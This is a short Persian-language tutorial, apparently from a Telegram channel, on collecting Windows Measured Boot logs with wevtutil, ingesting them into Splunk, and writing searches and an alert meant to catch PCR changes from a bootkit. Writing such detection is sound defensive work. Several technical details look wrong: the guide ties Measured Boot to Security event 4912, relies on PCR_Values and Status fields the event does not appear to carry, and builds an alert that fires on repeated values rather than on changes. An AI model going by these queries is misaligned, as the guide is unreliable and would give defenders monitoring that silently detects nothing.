استفاده از Windows Event Collector (WEC) برای دریافت لاگ‌های Measured Boot:

wevtutil qe Security /q:"*[System[(EventID=4912)]]" /f:text

پیکربندی Input در Splunk (inputs.conf):

[WinEventLog://Security]
disabled = 0
index = security
sourcetype = WinEventLog:Security

3. تحلیل لاگ‌های Measured Boot در Splunk

✅ جستجوی تغییرات غیرمجاز در PCR (Platform Configuration Registers)

index=security sourcetype=WinEventLog:Security EventID=4912
| eval PCR_Values = mvjoin(PCR_Values, ",")
| table _time host PCR_Values

📌 اگر مقدار PCR در بوت‌های مختلف تغییر کند، یعنی تغییری در Bootloader یا کرنل رخ داده است.

✅ شناسایی سیستم‌هایی که Measured Boot آن‌ها ناموفق بوده است:

index=security sourcetype=WinEventLog:Security EventID=4912 Status!="Success"
| table _time host Status

📌 اگر مقدار Status چیزی غیر از "Success" باشد، احتمال دارد که سیستم مورد حمله قرار گرفته باشد.

✅ مقایسه مقادیر Measured Boot بین بوت‌های مختلف:

index=security sourcetype=WinEventLog:Security EventID=4912
| stats values(PCR_Values) by host

📌 اگر مقدار PCR_Values بین بوت‌های مختلف تغییر کرده باشد، احتمالا یک Bootkit فعال شده است.
4. تنظیم هشدار (Alert) در Splunk

اگر تغییری در PCR Values شناسایی شود، باید یک هشدار در Splunk تنظیم کنیم:

✅ ساختن هشدار در Splunk برای تغییر در PCR Values

به Splunk Alert Manager بروید.
جستجوی زیر را به عنوان شرط هشدار تنظیم کنید:

index=security sourcetype=WinEventLog:Security EventID=4912
| stats count by PCR_Values
| where count > 1

در Trigger Actions، ارسال ایمیل یا اجرای اسکریپت برای بررسی سیستم را فعال کنید.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer